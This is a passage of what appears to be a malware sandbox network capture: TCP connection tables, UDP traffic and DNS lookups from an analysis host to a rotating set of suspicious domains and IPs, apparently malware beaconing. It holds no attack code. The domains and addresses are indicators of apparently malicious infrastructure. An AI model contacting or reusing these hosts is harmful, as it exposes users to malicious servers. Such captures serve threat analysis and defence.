                                                                  Dec 4, 2024 12:51:42.097157955 CET8049998209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:42.097255945 CET8049998209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:42.097305059 CET4999880192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:42.363135099 CET4999880192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:43.379414082 CET5000580192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:43.499221087 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:43.499424934 CET5000580192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:43.514550924 CET5000580192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:43.637729883 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:43.637742996 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:43.637758970 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:43.637768030 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:43.637839079 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:43.637856007 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:43.637940884 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:43.637994051 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:43.638041019 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:44.806919098 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:44.807110071 CET8050005209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:44.812561989 CET5000580192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:45.054011106 CET5000580192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:46.067132950 CET5001280192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:46.187078953 CET8050012209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:46.187241077 CET5001280192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:46.201370955 CET5001280192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:46.321198940 CET8050012209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:47.415009975 CET8050012209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:47.415558100 CET8050012209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:51:47.416117907 CET5001280192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:47.417943001 CET5001280192.168.2.4209.74.77.107
                                                                  Dec 4, 2024 12:51:47.537879944 CET8050012209.74.77.107192.168.2.4
                                                                  Dec 4, 2024 12:52:05.415483952 CET5003780192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:05.535396099 CET8050037104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:05.535586119 CET5003780192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:05.550359011 CET5003780192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:05.670639992 CET8050037104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:06.692665100 CET8050037104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:06.692759037 CET8050037104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:06.692770004 CET8050037104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:06.692831039 CET5003780192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:07.063324928 CET5003780192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:08.083012104 CET5003880192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:08.202817917 CET8050038104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:08.202944040 CET5003880192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:08.220882893 CET5003880192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:08.340594053 CET8050038104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:09.364029884 CET8050038104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:09.364093065 CET8050038104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:09.364227057 CET5003880192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:09.364648104 CET8050038104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:09.364761114 CET5003880192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:09.736571074 CET5003880192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:10.755289078 CET5003980192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:10.875293970 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:10.875391960 CET5003980192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:10.892441034 CET5003980192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:11.012470961 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:11.012532949 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:11.012748003 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:11.012826920 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:11.012922049 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:11.012938023 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:11.013055086 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:11.013114929 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:11.013191938 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:12.088907003 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:12.089037895 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:12.089087963 CET5003980192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:12.089854002 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:12.090009928 CET8050039104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:12.090064049 CET5003980192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:12.391478062 CET5003980192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:13.427467108 CET5004080192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:13.547350883 CET8050040104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:13.547976971 CET5004080192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:13.560717106 CET5004080192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:13.680671930 CET8050040104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:14.720558882 CET8050040104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:14.720679045 CET8050040104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:14.720691919 CET8050040104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:14.720776081 CET5004080192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:14.721014023 CET8050040104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:14.721064091 CET5004080192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:14.725480080 CET5004080192.168.2.4104.21.34.103
                                                                  Dec 4, 2024 12:52:14.845180988 CET8050040104.21.34.103192.168.2.4
                                                                  Dec 4, 2024 12:52:22.503776073 CET5004180192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:22.626266003 CET805004120.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:22.626349926 CET5004180192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:22.645529985 CET5004180192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:22.769809961 CET805004120.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:24.157273054 CET5004180192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:24.186882019 CET805004120.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:24.186897993 CET805004120.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:24.186944962 CET5004180192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:24.186960936 CET5004180192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:24.277054071 CET805004120.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:24.277108908 CET5004180192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:25.178699970 CET5004280192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:25.298810959 CET805004220.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:25.299597979 CET5004280192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:25.332273960 CET5004280192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:25.452311993 CET805004220.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:26.816433907 CET805004220.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:26.816452980 CET805004220.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:26.816512108 CET5004280192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:26.844629049 CET5004280192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:27.863266945 CET5004380192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:27.985069036 CET805004320.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:27.985265970 CET5004380192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:28.004697084 CET5004380192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:28.124681950 CET805004320.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:28.124752998 CET805004320.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:28.125005007 CET805004320.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:28.125024080 CET805004320.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:28.125148058 CET805004320.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:28.125164986 CET805004320.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:28.125444889 CET805004320.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:28.125456095 CET805004320.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:28.125545979 CET805004320.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:29.518404961 CET5004380192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:29.556543112 CET805004320.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:29.562396049 CET5004380192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:29.638812065 CET805004320.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:29.646399021 CET5004380192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:30.537442923 CET5004480192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:30.657494068 CET805004420.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:30.657572985 CET5004480192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:30.669382095 CET5004480192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:30.789150000 CET805004420.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:32.225622892 CET805004420.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:32.225784063 CET805004420.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:32.225833893 CET5004480192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:32.228988886 CET5004480192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:32.348835945 CET805004420.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:37.790525913 CET5004580192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:37.910257101 CET8050045156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:37.910334110 CET5004580192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:37.927136898 CET5004580192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:38.047116995 CET8050045156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:39.414115906 CET8050045156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:39.414305925 CET8050045156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:39.414423943 CET5004580192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:39.440506935 CET5004580192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:40.458022118 CET5004680192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:40.579067945 CET8050046156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:40.579180002 CET5004680192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:40.599422932 CET5004680192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:40.719676018 CET8050046156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:42.082777977 CET8050046156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:42.082807064 CET8050046156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:42.082860947 CET5004680192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:42.110251904 CET5004680192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:43.129062891 CET5004780192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:43.248933077 CET8050047156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:43.249115944 CET5004780192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:43.266453028 CET5004780192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:43.386307955 CET8050047156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:43.386329889 CET8050047156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:43.386456013 CET8050047156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:43.386465073 CET8050047156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:43.386499882 CET8050047156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:43.386526108 CET8050047156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:43.386709929 CET8050047156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:43.386718988 CET8050047156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:43.386734962 CET8050047156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:44.751914024 CET8050047156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:44.766521931 CET5004780192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:45.788470984 CET5004880192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:45.909420013 CET8050048156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:45.909732103 CET5004880192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:45.918762922 CET5004880192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:46.038775921 CET8050048156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:47.426070929 CET8050048156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:47.426183939 CET8050048156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:47.426256895 CET5004880192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:47.428953886 CET5004880192.168.2.4156.251.17.224
                                                                  Dec 4, 2024 12:52:47.548856974 CET8050048156.251.17.224192.168.2.4
                                                                  Dec 4, 2024 12:52:52.859081030 CET5004980192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:52:52.979618073 CET805004947.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:52.979737997 CET5004980192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:52:52.994168997 CET5004980192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:52:53.114332914 CET805004947.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:54.298651934 CET805004947.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:54.298670053 CET805004947.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:54.298683882 CET805004947.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:54.298722982 CET5004980192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:52:54.298780918 CET5004980192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:52:54.501100063 CET5004980192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:52:55.522439003 CET5005080192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:52:55.642456055 CET805005047.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:55.642592907 CET5005080192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:52:55.658442974 CET5005080192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:52:55.778367996 CET805005047.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:56.964818001 CET805005047.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:56.964917898 CET805005047.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:56.964929104 CET805005047.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:56.964993954 CET5005080192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:52:57.172818899 CET5005080192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:52:58.193053961 CET5005180192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:52:58.312808990 CET805005147.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:58.312926054 CET5005180192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:52:58.330331087 CET5005180192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:52:58.450131893 CET805005147.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:58.450205088 CET805005147.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:58.450325012 CET805005147.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:58.450350046 CET805005147.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:58.450442076 CET805005147.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:58.450450897 CET805005147.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:58.450532913 CET805005147.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:58.450542927 CET805005147.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:58.450552940 CET805005147.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:59.712037086 CET805005147.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:59.712075949 CET805005147.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:59.712086916 CET805005147.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:52:59.716475964 CET5005180192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:52:59.987799883 CET5005180192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:53:01.004764080 CET5005280192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:53:01.124653101 CET805005247.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:53:01.125210047 CET5005280192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:53:01.134576082 CET5005280192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:53:01.254196882 CET805005247.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:53:02.437973022 CET805005247.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:53:02.438080072 CET805005247.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:53:02.438091993 CET805005247.254.140.255192.168.2.4
                                                                  Dec 4, 2024 12:53:02.438178062 CET5005280192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:53:02.438206911 CET5005280192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:53:02.441740990 CET5005280192.168.2.447.254.140.255
                                                                  Dec 4, 2024 12:53:02.562771082 CET805005247.254.140.255192.168.2.4

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 4, 2024 12:49:32.538466930 CET5290153192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:49:33.157068968 CET53529011.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:49:49.675842047 CET6118253192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:49:50.657403946 CET53611821.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:50:05.316675901 CET5781653192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:50:06.328761101 CET5781653192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:50:06.685323000 CET53578161.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:50:06.685478926 CET53578161.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:50:21.332247972 CET5661253192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:50:22.328877926 CET5661253192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:50:22.414875984 CET53566121.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:50:22.467202902 CET53566121.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:50:36.865669012 CET5882353192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:50:37.445986986 CET53588231.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:50:52.058123112 CET6292053192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:50:52.387238979 CET53629201.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:51:07.300940990 CET6303153192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:51:07.634727001 CET53630311.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:51:22.207858086 CET6427653192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:51:22.885624886 CET53642761.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:51:37.554310083 CET5225653192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:51:38.033061981 CET53522561.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:51:52.428934097 CET5699353192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:51:53.442363024 CET5699353192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:51:54.454132080 CET5699353192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:51:56.469928026 CET5699353192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:51:56.748222113 CET53569931.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:51:56.748239994 CET53569931.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:51:56.748253107 CET53569931.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:51:56.748420000 CET53569931.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:51:57.752845049 CET6317853192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:51:57.892654896 CET53631781.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:52:05.074359894 CET6234753192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:52:05.409758091 CET53623471.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:52:19.740488052 CET5046853192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:52:20.751144886 CET5046853192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:52:21.757591963 CET5046853192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:52:22.500828981 CET53504681.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:52:22.500848055 CET53504681.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:52:22.500941992 CET53504681.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:52:37.238986015 CET5523753192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:52:37.783214092 CET53552371.1.1.1192.168.2.4
                                                                  Dec 4, 2024 12:52:52.442342997 CET6206553192.168.2.41.1.1.1
                                                                  Dec 4, 2024 12:52:52.856460094 CET53620651.1.1.1192.168.2.4

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Dec 4, 2024 12:49:32.538466930 CET192.168.2.41.1.1.10x72f9Standard query (0)www.nb-shenshi.buzzA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:49:49.675842047 CET192.168.2.41.1.1.10xa59dStandard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:50:05.316675901 CET192.168.2.41.1.1.10x1c70Standard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:50:06.328761101 CET192.168.2.41.1.1.10x1c70Standard query (0)www.xcvbj.asiaA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:50:21.332247972 CET192.168.2.41.1.1.10x9855Standard query (0)www.soainsaat.xyzA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:50:22.328877926 CET192.168.2.41.1.1.10x9855Standard query (0)www.soainsaat.xyzA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:50:36.865669012 CET192.168.2.41.1.1.10xc924Standard query (0)www.amayavp.xyzA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:50:52.058123112 CET192.168.2.41.1.1.10xbfbcStandard query (0)www.vayui.topA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:51:07.300940990 CET192.168.2.41.1.1.10x6461Standard query (0)www.rgenerousrs.storeA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:51:22.207858086 CET192.168.2.41.1.1.10x2949Standard query (0)www.t91rl7.proA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:51:37.554310083 CET192.168.2.41.1.1.10x34eeStandard query (0)www.learnwithus.siteA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:51:52.428934097 CET192.168.2.41.1.1.10x559eStandard query (0)www.cuthethoi.onlineA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:51:53.442363024 CET192.168.2.41.1.1.10x559eStandard query (0)www.cuthethoi.onlineA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:51:54.454132080 CET192.168.2.41.1.1.10x559eStandard query (0)www.cuthethoi.onlineA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:51:56.469928026 CET192.168.2.41.1.1.10x559eStandard query (0)www.cuthethoi.onlineA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:51:57.752845049 CET192.168.2.41.1.1.10x1419Standard query (0)www.cuthethoi.onlineA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:52:05.074359894 CET192.168.2.41.1.1.10x7a80Standard query (0)www.rafconstrutora.onlineA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:52:19.740488052 CET192.168.2.41.1.1.10x5d8eStandard query (0)www.7vh2wy.topA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:52:20.751144886 CET192.168.2.41.1.1.10x5d8eStandard query (0)www.7vh2wy.topA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:52:21.757591963 CET192.168.2.41.1.1.10x5d8eStandard query (0)www.7vh2wy.topA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:52:37.238986015 CET192.168.2.41.1.1.10xa0caStandard query (0)www.duwixushx.xyzA (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:52:52.442342997 CET192.168.2.41.1.1.10x8219Standard query (0)www.yvcp3.infoA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 4, 2024 12:49:33.157068968 CET1.1.1.1192.168.2.40x72f9No error (0)www.nb-shenshi.buzz161.97.168.245A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:49:50.657403946 CET1.1.1.1192.168.2.40xa59dNo error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 4, 2024 12:49:50.657403946 CET1.1.1.1192.168.2.40xa59dNo error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:49:50.657403946 CET1.1.1.1192.168.2.40xa59dNo error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:49:50.657403946 CET1.1.1.1192.168.2.40xa59dNo error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:49:50.657403946 CET1.1.1.1192.168.2.40xa59dNo error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:50:06.685323000 CET1.1.1.1192.168.2.40x1c70No error (0)www.xcvbj.asia149.88.81.190A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:50:06.685478926 CET1.1.1.1192.168.2.40x1c70No error (0)www.xcvbj.asia149.88.81.190A (IP address)IN (0x0001)false
                                                                  Dec 4, 2024 12:50:22.414875984 CET1.1.1.1192.168.2.40x9855No error (0)www.soainsaat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 4, 2024 12:50:22.414875984 CET1.1.1.1192.168.2.40x9855No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 4, 2024 12:50:22.414875984 CET1.1.1.1192.168.2.40x9855No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
